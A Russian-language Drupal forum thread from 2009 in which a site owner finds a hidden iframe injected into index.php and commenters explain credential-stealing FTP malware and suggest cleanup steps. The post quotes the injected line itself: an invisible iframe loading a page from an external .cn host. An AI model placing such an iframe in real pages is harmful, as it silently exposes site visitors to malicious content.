Iframe

Аватар пользователя Loasty Loasty 28 июня 2009 в 16:02

У меня последняя версия 6.12 нашел сегодня iframe в index.php

...
}
elseif (isset($return)) {
  // Print any value (including an empty string) except NULL or undefined:
  print theme('page',
<iframe src="http://beachhousename.cn:8080/index.php" width=149 height=155 style="visibility: hidden"></iframe>

Откуда? Как?

0 Thanks

Комментарии

Аватар пользователя Geldora Geldora 28 июня 2009 в 16:37

Взломали ваш хостинг!!!

Меняйте пароли, не храните их в фтп-менеджере, проверьте антивирусом сайт и свой компьютер, сообщите хостеру - о том, что их хостинг взломали (и, возможно, готовьтесь переезжать на другой).

К самому Друпалу это не имеет никакого отношения.

Можно еще индекс.пхп от записи закрять - права 444.

Аватар пользователя Loasty Loasty 28 июня 2009 в 17:19

Как они украли пароль? Проверил и Nod32 и Касперским, нет у меня вирусов. Пользуюсь FileZilla... Использую быстрое подключение...

Аватар пользователя kosilko kosilko 28 июня 2009 в 17:38

это байан. Пароли никто у вас не тырит, алгоритм прост - вы заражаетесь вирусом, он читает ваши сохранённые пароли от фтп (и не только от фтп кстати) и приконнектившись к серверу под вашей учеткой заражает индексные скрипты. А потом через ваш сайт заражается другой веб-мастер...

Аватар пользователя fuCkLaw fuCkLaw 28 июня 2009 в 17:41

да - это не человек напрямую тырит, а робот. но на drupal если в index.php вставлен подобный фрейм сайт вообще не открывается.

Аватар пользователя kosilko kosilko 28 июня 2009 в 18:31

инструменты -> настройки -> содержимое -> настроить стили -> снять галку "включить inline-фреймы". Далее, если кое какие сайты с фреймами не будут отображаться нормально (например гмейл), можно через настройки для сайта включить фреймы персонально для него.
И не устанавливать акробат ридер , замена если надо - foxit-reader.

Аватар пользователя Обухов Никита Обухов Никита 28 июня 2009 в 21:26
"Loasty" wrote:

Как они украли пароль? Проверил и Nod32 и Касперским, нет у меня вирусов.

Если хотите разобраться, отдайте компьютер специалистам.

Нод и Касперский ничего не гарантируют, если система ежедневно не обновляется. Если вы постоянно сидите под рутом. Если от имени рута запустили какой-нибудь кейген. И еще много, много если.

Аватар пользователя Обухов Никита Обухов Никита 28 июня 2009 в 21:27
"kosilko" wrote:

инструменты -> настройки -> содержимое -> настроить стили -> снять галку "включить inline-фреймы".

И зачем? То что он отключит фреймы не значит, что они пропадут из index.php

Аватар пользователя Loasty Loasty 28 июня 2009 в 22:18

Обухов Никита Уже установил на ноутбуке Ubuntu и для работы пользуюсь им. Так, что проблема решена.